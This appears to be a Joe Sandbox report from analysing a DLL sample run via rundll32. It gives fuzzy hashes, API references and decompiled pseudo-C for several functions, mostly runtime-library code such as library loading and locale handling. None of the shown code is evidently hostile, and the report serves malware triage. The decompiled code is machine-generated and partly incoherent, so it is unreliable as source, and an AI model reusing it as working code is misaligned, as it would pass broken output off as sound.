Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID: C:\Windows\SysWOW64\rundll32.exe
API String ID: 0-2837366778
Opcode ID: bbc049e0065af9d9264ab7fce4791e26f57c73b9850f6306894c5905cdc9b224
Instruction ID: 57770cad2dc7d873b8782db2f193e3cd771f19afa728aead8fe90cc5b1cf633c
Opcode Fuzzy Hash: bbc049e0065af9d9264ab7fce4791e26f57c73b9850f6306894c5905cdc9b224
Instruction Fuzzy Hash: 06219F7560021ABFE721DF61AC81E5B77ACFF412A47A24924FA2C97151DB31FC408BA0

Uniqueness

Uniqueness Score: -1.00%

Function 1000144D, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39
windowCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E1000144D(void* __ecx, void* __edx, struct HWND__* _a4, char _a12, intOrPtr _a16) {
				intOrPtr _v8;
				char _v12;
				void* _t23;

				_t23 = __edx;
				if((GetMenuState(GetSubMenu(GetMenu(_a4), 1), 0xcb, 0) & 0x00000008) != 0) {
					RedrawWindow(_a4, 0, 0, 0x105);
					E10001CFA(0x1004dc38);
					_v12 = _a12;
					_v8 = _a16;
					_push( &_v12);
					E10001102(_t23,  *0x1004dc38);
					 *0x1004dc34 = 1;
				}
				return 0;
			}

0x1000144d
0x10001476
0x10001482
0x1000148f
0x10001499
0x1000149f
0x100014a5
0x100014ac
0x100014b1
0x100014b1
0x100014bc

APIs

GetMenu.USER32 ref: 10001456
GetSubMenu.USER32 ref: 1000145F
GetMenuState.USER32(00000000,000000CB,00000000), ref: 1000146E
RedrawWindow.USER32(?,00000000,00000000,00000105), ref: 10001482

Part of subcall function 10001102: _Deallocate.LIBCONCRT ref: 1000113A

Strings

p<O, xrefs: 10001488, 100014A6

Memory Dump Source

Source File: 00000007.00000002.2112853162.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2112844322.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113030372.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113073198.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2113096062.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: Menu$DeallocateRedrawStateWindow
String ID: p<O
API String ID: 2380408669-1042322620
Opcode ID: 970e6ee6165374ff70056ff367cbba4755ef3d9930bf192b7c9da9b34f450319
Instruction ID: be1ad7771bc6ae16dbc7eccf9958df4cdf15cb777987d046380b36b05f21978e
Opcode Fuzzy Hash: 970e6ee6165374ff70056ff367cbba4755ef3d9930bf192b7c9da9b34f450319
Instruction Fuzzy Hash: D2F03C74601229BBEB11AF64CE8DECB3EA9EF06790F404055F905E6160DAB09941CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 10029E10, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 35
libraryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E10029E10(WCHAR* _a4) {
				struct HINSTANCE__* _t5;

				_t5 = LoadLibraryExW(_a4, 0, 0x800);
				if(_t5 != 0) {
					return _t5;
				} else {
					if(GetLastError() != 0x57 || E10023828(_a4, L"api-ms-", 7) == 0 || E10023828(_a4, L"ext-ms-", 7) == 0) {
						return 0;
					}
					return LoadLibraryExW(_a4, 0, 0);
				}
			}

0x10029e1f
0x10029e27
0x10029e72
0x10029e29
0x10029e32
0x00000000
0x10029e6f
0x10029e6e
0x10029e6e

APIs

LoadLibraryExW.KERNEL32(?,00000000,00000800,?,10029DC9), ref: 10029E1F
GetLastError.KERNEL32(?,10029DC9), ref: 10029E29
LoadLibraryExW.KERNEL32(?,00000000,00000000), ref: 10029E67

Strings

ext-ms-, xrefs: 10029E4C
api-ms-, xrefs: 10029E36

Memory Dump Source

Source File: 00000007.00000002.2112853162.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2112844322.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113030372.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113073198.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2113096062.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID: api-ms-$ext-ms-
API String ID: 3177248105-537541572
Opcode ID: 03b412f2dcfeb729a237b2d803d91605f4d356a3e8cd5e5128e68d377a8432c2
Instruction ID: baf72c8e3dffbcae0311709dc34ded704fcdaf485427fd651554a83b46c1da09
Opcode Fuzzy Hash: 03b412f2dcfeb729a237b2d803d91605f4d356a3e8cd5e5128e68d377a8432c2
Instruction Fuzzy Hash: 0DF03030640249B7EF109B61ED46B5A3F99EB506C0FA24430FE0CE84E5EBA2E9519599

Uniqueness

Uniqueness Score: -1.00%

Function 1001070E, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 25%

			E1001070E(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				_Unknown_base(*)()* _t8;
				_Unknown_base(*)()* _t14;

				_v8 = _v8 & 0x00000000;
				_t8 =  &_v8;
				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t8, __ecx);
				if(_t8 != 0) {
					_t8 = GetProcAddress(_v8, "CorExitProcess");
					_t14 = _t8;
					if(_t14 != 0) {
						 *0x1004223c(_a4);
						_t8 =  *_t14();
					}
				}
				if(_v8 != 0) {
					return FreeLibrary(_v8);
				}
				return _t8;
			}

0x10010714
0x10010718
0x10010723
0x1001072b
0x10010736
0x1001073c
0x10010740
0x10010747
0x1001074d
0x1001074d
0x1001074f
0x10010754
0x00000000
0x10010759
0x10010760

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,10010695,?,?,1001065D,00000000,70D9FFF6,?), ref: 10010723
GetProcAddress.KERNEL32(00000000,CorExitProcess,00000000,?,?,10010695,?,?,1001065D,00000000,70D9FFF6,?), ref: 10010736
FreeLibrary.KERNEL32(00000000,?,?,10010695,?,?,1001065D,00000000,70D9FFF6,?), ref: 10010759

Strings

CorExitProcess, xrefs: 1001072E
mscoree.dll, xrefs: 1001071C

Memory Dump Source

Source File: 00000007.00000002.2112853162.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2112844322.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113030372.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113073198.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2113096062.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 50b634fdbf317f93d03933747c97007d475fe10918e8b11ab9f1374748a6aaeb
Instruction ID: afe5ac3e96f71655a5e367b3be99abbbceb1196fcb5638c15691c36776f791ea
Opcode Fuzzy Hash: 50b634fdbf317f93d03933747c97007d475fe10918e8b11ab9f1374748a6aaeb
Instruction Fuzzy Hash: 31F08230B01129FBDB01DB50CE49BDD7BA8DF00791F104060F941E10A0CB70DE40DB99

Uniqueness

Uniqueness Score: -1.00%

Function 100257D6, Relevance: 7.7, APIs: 5, Instructions: 186
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E100257D6(void* __ebx, signed int __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				intOrPtr* _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				signed int _v60;
				char _v276;
				short _v278;
				short _v280;
				char _v448;
				signed int _v452;
				short _v454;
				intOrPtr _v456;
				signed int _v460;
				intOrPtr _v464;
				signed int _v468;
				signed int _v472;
				intOrPtr _v512;
				char _v536;
				intOrPtr _v540;
				signed int _v544;
				intOrPtr _v548;
				signed int _v560;
				char _v708;
				signed int _v712;
				short _v714;
				signed int _v716;
				signed int _v720;
				signed int _v724;
				intOrPtr _v728;
				signed int _v732;
				intOrPtr _v736;
				signed int* _v740;
				signed int _v744;
				signed int _v748;
				signed int _v752;
				char _v824;
				char _v1252;
				char _v1268;
				intOrPtr _v1284;
				signed int _v1288;
				signed short _v1324;
				void* __ebp;
				signed int _t247;
				void* _t250;
				signed int _t253;
				signed int _t255;
				signed int _t261;
				signed int _t262;
				signed int _t263;
				signed int _t264;
				signed int _t265;
				signed int _t266;
				void* _t268;
				signed int _t269;
				signed int _t270;
				signed int _t271;
				signed int _t273;
				signed int _t276;
				signed int _t283;
				signed int _t284;
				signed int _t286;
				signed int _t287;
				intOrPtr _t288;
				signed int _t291;
				signed int _t293;
				intOrPtr _t294;
				signed int _t297;
				signed int _t299;
				void* _t300;
				signed int _t306;
				signed int _t307;
				signed int _t309;
				signed int _t310;
				signed int _t326;
				signed int _t328;
				signed int _t330;
				signed int _t334;
				void* _t335;
				signed int _t337;
				void* _t338;
				intOrPtr _t339;
				signed int* _t342;
				signed int _t343;
				signed int _t344;
				intOrPtr* _t349;
				signed int _t363;
				signed int _t365;
				signed int _t367;
				intOrPtr* _t368;
				signed int _t370;
				void* _t375;
				signed int _t379;
				intOrPtr* _t380;
				intOrPtr* _t383;
				void* _t386;
				signed int _t387;
				signed int _t390;
				intOrPtr* _t391;
				intOrPtr _t402;
				intOrPtr* _t403;
				signed int _t405;
				signed int _t410;
				signed int _t411;
				signed int* _t415;
				signed int _t416;
				signed int _t425;
				short _t426;
				signed int _t428;
				intOrPtr _t429;
				signed int _t432;
				intOrPtr _t433;
				signed int _t435;
				signed int _t438;
				intOrPtr _t444;
				signed int _t445;
				signed int _t447;
				signed int _t448;
				signed int _t452;
				signed int _t454;
				signed int _t457;
				signed int* _t458;
				short _t459;
				signed int _t461;
				signed int _t462;
				void* _t464;
				void* _t465;
				signed int _t466;
				void* _t467;
				void* _t468;
				signed int _t469;
				void* _t471;
				void* _t472;
				signed int _t484;

				_t424 = __edx;
				_push(__ebx);
				_push(__esi);
				_v12 = 1;
				_t363 = E10024214(0x6a6);
				_t246 = 0;
				_pop(_t375);
				if(_t363 == 0) {
					L20:
					return _t246;
				} else {
					_push(__edi);
					 *_t363 = 1;
					_t428 = _t363 + 4;
					_t444 = _a4;
					 *_t428 = 0;
					_t247 = _t444 + 0x30;
					_push( *_t247);
					_v16 = _t247;
					_push(0x10044e40);
					_push( *0x10044d7c);
					E10025712(_t363, _t375, __edx, _t428, _t444, _t428, 0x351, 3);
					_t465 = _t464 + 0x18;
					_v8 = 0x10044d7c;
					while(1) {
						L2:
						_t250 = E1002F999(_t428, 0x351, 0x10044e3c);
						_t466 = _t465 + 0xc;
						if(_t250 != 0) {
							break;
						} else {
							_t342 = _v16;
							_t415 =  &(_t342[4]);
							_t343 =  *_t342;
							_v16 = _t415;
							_t416 =  *_t415;
							_v20 = _t416;
							goto L4;
						}
						while(1) {
							L4:
							_t424 =  *_t343;
							if(_t424 !=  *_t416) {
								break;
							}
							if(_t424 == 0) {
								L8:
								_t344 = 0;
							} else {
								_t424 =  *((intOrPtr*)(_t343 + 2));
								if(_t424 !=  *((intOrPtr*)(_t416 + 2))) {
									break;
								} else {
									_t343 = _t343 + 4;
									_t416 = _t416 + 4;
									if(_t424 != 0) {
										continue;
									} else {
										goto L8;
									}
								}
							}
							L10:
							_push(_v20);
							_push(0x10044e40);
							asm("sbb eax, eax");
							_v12 = _v12 &  !( ~_t344);
							_t349 = _v8 + 0xc;
							_v8 = _t349;
							_push( *_t349);
							E10025712(_t363, _t416, _t424, _t428, _t444, _t428, 0x351, 3);
							_t465 = _t466 + 0x18;
							if(_v8 < 0x10044dac) {
								goto L2;
							} else {
								if(_v12 != 0) {
									E100268B3(_t363);
									_t435 = _t428 | 0xffffffff;
									__eflags =  *(_t444 + 0x28);
									if(__eflags != 0) {
										asm("lock xadd [ecx], eax");
										if(__eflags == 0) {
											E100268B3( *(_t444 + 0x28));
										}
									}
									__eflags =  *(_t444 + 0x24);
									if( *(_t444 + 0x24) != 0) {
										asm("lock xadd [eax], edi");
										__eflags = _t435 == 1;
										if(_t435 == 1) {
											E100268B3( *(_t444 + 0x24));
										}
									}
									 *(_t444 + 0x24) = 0;
									 *(_t444 + 0x1c) = 0;
									 *(_t444 + 0x28) = 0;
									 *((intOrPtr*)(_t444 + 0x20)) = 0;
									_t246 =  *((intOrPtr*)(_t444 + 0x40));
								} else {
									_t438 = _t428 | 0xffffffff;
									_t484 =  *(_t444 + 0x28);
									if(_t484 != 0) {
										asm("lock xadd [ecx], eax");
										if(_t484 == 0) {
											E100268B3( *(_t444 + 0x28));
										}
									}
									if( *(_t444 + 0x24) != 0) {
										asm("lock xadd [eax], edi");
										if(_t438 == 1) {
											E100268B3( *(_t444 + 0x24));
										}
									}
									 *(_t444 + 0x24) =  *(_t444 + 0x24) & 0x00000000;
									_t246 = _t363 + 4;
									 *(_t444 + 0x1c) =  *(_t444 + 0x1c) & 0x00000000;
									 *(_t444 + 0x28) = _t363;
									 *((intOrPtr*)(_t444 + 0x20)) = _t246;
								}
								goto L20;
							}
							goto L135;
						}
						asm("sbb eax, eax");
						_t344 = _t343 | 0x00000001;
						__eflags = _t344;
						goto L10;
					}
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E1000E341();
					asm("int3");
					_t461 = _t466;
					_t467 = _t466 - 0x1d0;
					_t253 =  *0x1004d054; // 0xd94e5c04
					_v60 = _t253 ^ _t461;
					_t255 = _v44;
					_push(_t363);
					_push(_t444);
					_t445 = _v40;
					_push(_t428);
					_t429 = _v48;
					_v512 = _t429;
					__eflags = _t255;
					if(_t255 == 0) {
						_v460 = 1;
						_v472 = 0;
						_t365 = 0;
						_v452 = 0;
						__eflags = _t445;
						if(__eflags == 0) {
							L79:
							_t255 = E100257D6(_t365, _t424, _t429, _t445, __eflags, _t429);
							goto L80;
						} else {
							__eflags =  *_t445 - 0x4c;
							if( *_t445 != 0x4c) {
								L59:
								_t255 = E100250E8(_t424, _t445,  &_v276, 0x83,  &_v448, 0x55,  &_v468);
								_t468 = _t467 + 0x18;
								__eflags = _t255;
								if(_t255 != 0) {
									_t379 = 0;
									__eflags = 0;
									_t425 = _t429 + 0x20;
									_t447 = 0;
									_v452 = _t425;
									do {
										__eflags = _t447;
										if(_t447 == 0) {
											L74:
											_t261 = _v460;
										} else {
											_t380 =  *_t425;
											_t262 =  &_v276;
											while(1) {
												__eflags =  *_t262 -  *_t380;
												_t429 = _v464;
												if( *_t262 !=  *_t380) {
													break;
												}
												__eflags =  *_t262;
												if( *_t262 == 0) {
													L67:
													_t379 = 0;
													_t263 = 0;
												} else {
													_t426 =  *((intOrPtr*)(_t262 + 2));
													__eflags = _t426 -  *((intOrPtr*)(_t380 + 2));
													_v454 = _t426;
													_t425 = _v452;
													if(_t426 !=  *((intOrPtr*)(_t380 + 2))) {
														break;
													} else {
														_t262 = _t262 + 4;
														_t380 = _t380 + 4;
														__eflags = _v454;
														if(_v454 != 0) {
															continue;
														} else {
															goto L67;
														}
													}
												}
												L69:
												__eflags = _t263;
												if(_t263 == 0) {
													_t365 = _t365 + 1;
													__eflags = _t365;
													goto L74;
												} else {
													_t264 =  &_v276;
													_push(_t264);
													_push(_t447);
													_push(_t429);
													L83();
													_t425 = _v452;
													_t468 = _t468 + 0xc;
													__eflags = _t264;
													if(_t264 == 0) {
														_t379 = 0;
														_t261 = 0;
														_v460 = 0;
													} else {
														_t365 = _t365 + 1;
														_t379 = 0;
														goto L74;
													}
												}
												goto L75;
											}
											asm("sbb eax, eax");
											_t263 = _t262 | 0x00000001;
											_t379 = 0;
											__eflags = 0;
											goto L69;
										}
										L75:
										_t447 = _t447 + 1;
										_t425 = _t425 + 0x10;
										_v452 = _t425;
										__eflags = _t447 - 5;
									} while (_t447 <= 5);
									__eflags = _t261;
									if(__eflags != 0) {
										goto L79;
									} else {
										__eflags = _t365;
										if(__eflags != 0) {
											goto L79;
										} else {
											_t255 = _t379;
										}
									}
								}
								goto L80;
							} else {
								__eflags =  *(_t445 + 2) - 0x43;
								if( *(_t445 + 2) != 0x43) {
									goto L59;
								} else {
									__eflags =  *((short*)(_t445 + 4)) - 0x5f;
									if( *((short*)(_t445 + 4)) != 0x5f) {
										goto L59;
									} else {
										while(1) {
											_t265 = E1002FC2F(_t445, 0x10044e34);
											_t367 = _t265;
											_v468 = _t367;
											_pop(_t382);
											__eflags = _t367;
											if(_t367 == 0) {
												break;
											}
											_t266 = _t265 - _t445;
											__eflags = _t266;
											_v460 = _t266 >> 1;
											if(_t266 == 0) {
												break;
											} else {
												_t268 = 0x3b;
												__eflags =  *_t367 - _t268;
												if( *_t367 == _t268) {
													break;
												} else {
													_t432 = _v460;
													_t368 = 0x10044d7c;
													_v456 = 1;
													do {
														_t269 = E10023828( *_t368, _t445, _t432);
														_t467 = _t467 + 0xc;
														__eflags = _t269;
														if(_t269 != 0) {
															goto L45;
														} else {
															_t383 =  *_t368;
															_t424 = _t383 + 2;
															do {
																_t339 =  *_t383;
																_t383 = _t383 + 2;
																__eflags = _t339 - _v472;
															} while (_t339 != _v472);
															_t382 = _t383 - _t424 >> 1;
															__eflags = _t432 - _t383 - _t424 >> 1;
															if(_t432 != _t383 - _t424 >> 1) {
																goto L45;
															}
														}
														break;
														L45:
														_v456 = _v456 + 1;
														_t368 = _t368 + 0xc;
														__eflags = _t368 - 0x10044dac;
													} while (_t368 <= 0x10044dac);
													_t365 = _v468 + 2;
													_t270 = E1002FBD6(_t382, _t365, 0x10044e3c);
													_t429 = _v464;
													_t448 = _t270;
													_pop(_t386);
													__eflags = _t448;
													if(_t448 != 0) {
														L48:
														__eflags = _v456 - 5;
														if(_v456 > 5) {
															_t387 = _v452;
															goto L54;
														} else {
															_push(_t448);
															_t273 = E1002FBCB( &_v276, 0x83, _t365);
															_t469 = _t467 + 0x10;
															__eflags = _t273;
															if(_t273 != 0) {
																L82:
																_push(0);
																_push(0);
																_push(0);
																_push(0);
																_push(0);
																E1000E341();
																asm("int3");
																_push(_t461);
																_t462 = _t469;
																_t276 =  *0x1004d054; // 0xd94e5c04
																_v560 = _t276 ^ _t462;
																_push(_t365);
																_t370 = _v544;
																_push(_t448);
																_push(_t429);
																_t433 = _v548;
																_v1288 = _t370;
																_v1284 = E10023FB6(_t386, _t424) + 0x278;
																_t283 = E100250E8(_t424, _v540,  &_v824, 0x83,  &_v1252, 0x55,  &_v1268);
																_t471 = _t469 - 0x2e4 + 0x18;
																__eflags = _t283;
																if(_t283 == 0) {
																	L122:
																	_t284 = 0;
																	__eflags = 0;
																	goto L123;
																} else {
																	_t103 = _t370 + 2; // 0x2
																	_t452 = _t103 << 4;
																	__eflags = _t452;
																	_t286 =  &_v280;
																	_v720 = _t452;
																	_t424 =  *(_t452 + _t433);
																	_t390 = _t424;
																	while(1) {
																		_v712 = _v712 & 0x00000000;
																		__eflags =  *_t286 -  *_t390;
																		_t454 = _v720;
																		if( *_t286 !=  *_t390) {
																			break;
																		}
																		__eflags =  *_t286;
																		if( *_t286 == 0) {
																			L89:
																			_t287 = _v712;
																		} else {
																			_t459 =  *((intOrPtr*)(_t286 + 2));
																			__eflags = _t459 -  *((intOrPtr*)(_t390 + 2));
																			_v714 = _t459;
																			_t454 = _v720;
																			if(_t459 !=  *((intOrPtr*)(_t390 + 2))) {
																				break;
																			} else {
																				_t286 = _t286 + 4;
																				_t390 = _t390 + 4;
																				__eflags = _v714;
																				if(_v714 != 0) {
																					continue;
																				} else {
																					goto L89;
																				}
																			}
																		}
																		L91:
																		__eflags = _t287;
																		if(_t287 != 0) {
																			_t391 =  &_v280;
																			_t424 = _t391 + 2;
																			do {
																				_t288 =  *_t391;
																				_t391 = _t391 + 2;
																				__eflags = _t288 - _v712;
																			} while (_t288 != _v712);
																			_v716 = (_t391 - _t424 >> 1) + 1;
																			_t291 = E10024214(4 + ((_t391 - _t424 >> 1) + 1) * 2);
																			_v732 = _t291;
																			__eflags = _t291;
																			if(_t291 == 0) {
																				goto L122;
																			} else {
																				_v728 =  *((intOrPtr*)(_t454 + _t433));
																				_v748 =  *(_t433 + 0xa0 + _t370 * 4);
																				_v752 =  *(_t433 + 8);
																				_v736 = _t291 + 4;
																				_t293 = E10028A30(_t291 + 4, _v716,  &_v280);
																				_t472 = _t471 + 0xc;
																				__eflags = _t293;
																				if(_t293 != 0) {
																					_t294 = _v736;
																					_push(_t294);
																					_push(_t294);
																					_push(_t294);
																					_push(_t294);
																					_push(_t294);
																					E1000E341();
																					asm("int3");
																					_push(_t462);
																					_t297 = (_v1324 & 0x0000ffff) - 0x2d;
																					__eflags = _t297;
																					if(_t297 == 0) {
																						L134:
																						__eflags = 0;
																						return 0;
																					} else {
																						_t299 = _t297 - 1;
																						__eflags = _t299;
																						if(_t299 == 0) {
																							_t300 = 2;
																							return _t300;
																						} else {
																							__eflags = _t299 == 0x31;
																							if(_t299 == 0x31) {
																								goto L134;
																							} else {
																								__eflags = 1;
																								return 1;
																							}
																						}
																					}
																				} else {
																					__eflags = _v280 - 0x43;
																					 *((intOrPtr*)(_t454 + _t433)) = _v736;
																					if(_v280 != 0x43) {
																						L100:
																						_t306 = E10024D73(_t370, _t433,  &_v708);
																						_t424 = _v712;
																					} else {
																						__eflags = _v278;
																						if(_v278 != 0) {
																							goto L100;
																						} else {
																							_t424 = _v712;
																							_t306 = _t424;
																						}
																					}
																					 *(_t433 + 0xa0 + _t370 * 4) = _t306;
																					__eflags = _t370 - 2;
																					if(_t370 != 2) {
																						__eflags = _t370 - 1;
																						if(_t370 != 1) {
																							__eflags = _t370 - 5;
																							if(_t370 == 5) {
																								 *((intOrPtr*)(_t433 + 0x14)) = _v724;
																							}
																						} else {
																							 *((intOrPtr*)(_t433 + 0x10)) = _v724;
																						}
																					} else {
																						_t458 = _v740;
																						 *(_t433 + 8) = _v724;
																						_v716 = _t458[8];
																						_t410 = _t458[9];
																						_v724 = _t410;
																						while(1) {
																							__eflags =  *(_t433 + 8) -  *(_t458 + _t424 * 8);
																							if( *(_t433 + 8) ==  *(_t458 + _t424 * 8)) {
																								break;
																							}
																							_t334 =  *(_t458 + _t424 * 8);
																							_t410 =  *(_t458 + 4 + _t424 * 8);
																							 *(_t458 + _t424 * 8) = _v716;
																							 *(_t458 + 4 + _t424 * 8) = _v724;
																							_t424 = _t424 + 1;
																							_t370 = _v744;
																							_v716 = _t334;
																							_v724 = _t410;
																							__eflags = _t424 - 5;
																							if(_t424 < 5) {
																								continue;
																							} else {
																							}
																							L108:
																							__eflags = _t424 - 5;
																							if(__eflags == 0) {
																								_t326 = E1002E537(_t424, __eflags, _v712, 1, 0x10044cf0, 0x7f,  &_v536,  *(_t433 + 8), 1);
																								_t472 = _t472 + 0x1c;
																								__eflags = _t326;
																								if(_t326 == 0) {
																									_t411 = _v712;
																								} else {
																									_t328 = _v712;
																									do {
																										 *(_t462 + _t328 * 2 - 0x20c) =  *(_t462 + _t328 * 2 - 0x20c) & 0x000001ff;
																										_t328 = _t328 + 1;
																										__eflags = _t328 - 0x7f;
																									} while (_t328 < 0x7f);
																									_t330 = E1003FDBF( &_v536,  *0x1004d0b4, 0xfe);
																									_t472 = _t472 + 0xc;
																									__eflags = _t330;
																									_t411 = 0 | _t330 == 0x00000000;
																								}
																								_t458[1] = _t411;
																								 *_t458 =  *(_t433 + 8);
																							}
																							 *(_t433 + 0x18) = _t458[1];
																							goto L120;
																						}
																						__eflags = _t424;
																						if(_t424 != 0) {
																							 *_t458 =  *(_t458 + _t424 * 8);
																							_t458[1] =  *(_t458 + 4 + _t424 * 8);
																							 *(_t458 + _t424 * 8) = _v716;
																							 *(_t458 + 4 + _t424 * 8) = _t410;
																						}
																						goto L108;
																					}
																					L120:
																					_t307 = _t370 * 0xc;
																					_t204 = _t307 + 0x10044d78; // 0x100245b6
																					 *0x1004223c(_t433);
																					_t309 =  *((intOrPtr*)( *_t204))();
																					_t402 = _v728;
																					__eflags = _t309;
																					if(_t309 == 0) {
																						__eflags = _t402 - 0x1004d178;
																						if(_t402 == 0x1004d178) {
																							L127:
																							_t310 = _v720;
																						} else {
																							_t457 = _t370 + _t370;
																							__eflags = _t457;
																							asm("lock xadd [eax], ecx");
																							if(_t457 != 0) {
																								goto L127;
																							} else {
																								E100268B3( *((intOrPtr*)(_t433 + 0x28 + _t457 * 8)));
																								E100268B3( *((intOrPtr*)(_t433 + 0x24 + _t457 * 8)));
																								E100268B3( *(_t433 + 0xa0 + _t370 * 4));
																								_t310 = _v720;
																								_t405 = _v712;
																								 *(_t310 + _t433) = _t405;
																								 *(_t433 + 0xa0 + _t370 * 4) = _t405;
																							}
																						}
																						_t403 = _v732;
																						 *_t403 = 1;
																						_t284 =  *(_t310 + _t433);
																						 *((intOrPtr*)(_t433 + 0x28 + (_t370 + _t370) * 8)) = _t403;
																					} else {
																						 *((intOrPtr*)(_v720 + _t433)) = _t402;
																						E100268B3( *(_t433 + 0xa0 + _t370 * 4));
																						 *(_t433 + 0xa0 + _t370 * 4) = _v748;
																						E100268B3(_v732);
																						 *(_t433 + 8) = _v752;
																						goto L122;
																					}
																					goto L123;
																				}
																			}
																		} else {
																			_t284 = _t424;
																			L123:
																			__eflags = _v16 ^ _t462;
																			return E100037EA(_t284, _v16 ^ _t462, _t424);
																		}
																		goto L135;
																	}
																	asm("sbb eax, eax");
																	_t287 = _t286 | 0x00000001;
																	__eflags = _t287;
																	goto L91;
																}
															} else {
																_t335 = _t448 + _t448;
																__eflags = _t335 - 0x106;
																if(_t335 >= 0x106) {
																	E10004292();
																	goto L82;
																} else {
																	 *((short*)(_t461 + _t335 - 0x10c)) = 0;
																	_t337 =  &_v276;
																	_push(_t337);
																	_push(_v456);
																	_push(_t429);
																	L83();
																	_t387 = _v452;
																	_t467 = _t469 + 0xc;
																	__eflags = _t337;
																	if(_t337 != 0) {
																		_t387 = _t387 + 1;
																		_v452 = _t387;
																	}
																	L54:
																	_t445 = _t365 + _t448 * 2;
																	_t271 =  *_t445 & 0x0000ffff;
																	_t424 = _t271;
																	__eflags = _t271;
																	if(_t271 != 0) {
																		_t445 = _t445 + 2;
																		__eflags = _t445;
																		_t424 =  *_t445 & 0x0000ffff;
																	}
																	__eflags = _t424;
																	if(_t424 != 0) {
																		continue;
																	} else {
																		__eflags = _t387;
																		if(__eflags != 0) {
																			goto L79;
																		} else {
																			break;
																		}
																		goto L80;
																	}
																}
															}
														}
													} else {
														_t338 = 0x3b;
														__eflags =  *_t365 - _t338;
														if( *_t365 != _t338) {
															break;
														} else {
															goto L48;
														}
													}
												}
											}
											goto L135;
										}
										_t255 = 0;
										goto L80;
									}
								}
							}
						}
					} else {
						__eflags = _t445;
						if(_t445 == 0) {
							_t255 =  *(_t429 + (_t255 + 2 + _t255 + 2) * 8);
						} else {
							_push(_t445);
							_push(_t255);
							_push(_t429);
							L83();
						}
						L80:
						__eflags = _v12 ^ _t461;
						return E100037EA(_t255, _v12 ^ _t461, _t424);
					}
				}
				L135:
			}

0x100257d6
0x100257de
0x100257df
0x100257e8
0x100257f0
0x100257f2
0x100257f4
0x100257f7
0x10025914
0x10025917
0x100257fd
0x100257fd
0x100257fe
0x10025800
0x10025803
0x10025806
0x10025809
0x1002580c
0x1002580e
0x10025811
0x10025816
0x10025824
0x1002582e
0x10025831
0x10025834
0x10025834
0x1002583f
0x10025844
0x10025849
0x00000000
0x1002584f
0x1002584f
0x10025852
0x10025855
0x10025857
0x1002585a
0x1002585c
0x1002585c
0x1002585c
0x1002585f
0x1002585f
0x1002585f
0x10025865
0x00000000
0x00000000
0x1002586a
0x10025881
0x10025881
0x1002586c
0x1002586c
0x10025874
0x00000000
0x10025876
0x10025876
0x10025879
0x1002587f
0x00000000
0x00000000
0x00000000
0x00000000
0x1002587f
0x10025874
0x1002588a
0x1002588a
0x1002588f
0x10025894
0x10025898
0x100258a4
0x100258a7
0x100258aa
0x100258b4
0x100258bc
0x100258c4
0x00000000
0x100258ca
0x100258ce
0x10025919
0x10025922
0x10025925
0x10025927
0x1002592b
0x1002592f
0x10025934
0x10025939
0x1002592f
0x1002593d
0x1002593f
0x10025941
0x10025945
0x10025946
0x1002594b
0x10025950
0x10025946
0x10025953
0x10025956
0x10025959
0x1002595c
0x1002595f
0x100258d0
0x100258d3
0x100258d6
0x100258d8
0x100258dc
0x100258e0
0x100258e5
0x100258ea
0x100258e0
0x100258f0
0x100258f2
0x100258f7
0x100258fc
0x10025901
0x100258f7
0x10025902
0x10025906
0x10025909
0x1002590d
0x10025910
0x10025910
0x00000000
0x10025913
0x00000000
0x100258c4
0x10025885
0x10025887
0x10025887
0x00000000
0x10025887
0x10025966
0x10025967
0x10025968
0x10025969
0x1002596a
0x1002596b
0x10025970
0x10025974
0x10025976
0x1002597c
0x10025983
0x10025986
0x10025989
0x1002598a
0x1002598b
0x1002598e
0x1002598f
0x10025992
0x10025998
0x1002599a
0x100259bf
0x100259c9
0x100259cf
0x100259d1
0x100259d7
0x100259d9
0x10025c39
0x10025c3a
0x00000000
0x100259df
0x100259df
0x100259e3
0x10025b51
0x10025b6e
0x10025b73
0x10025b76
0x10025b78
0x10025b7e
0x10025b7e
0x10025b80
0x10025b83
0x10025b85
0x10025b8b
0x10025b8b
0x10025b8d
0x10025c14
0x10025c14
0x10025b93
0x10025b93
0x10025b95
0x10025b9b
0x10025b9e
0x10025ba1
0x10025ba7
0x00000000
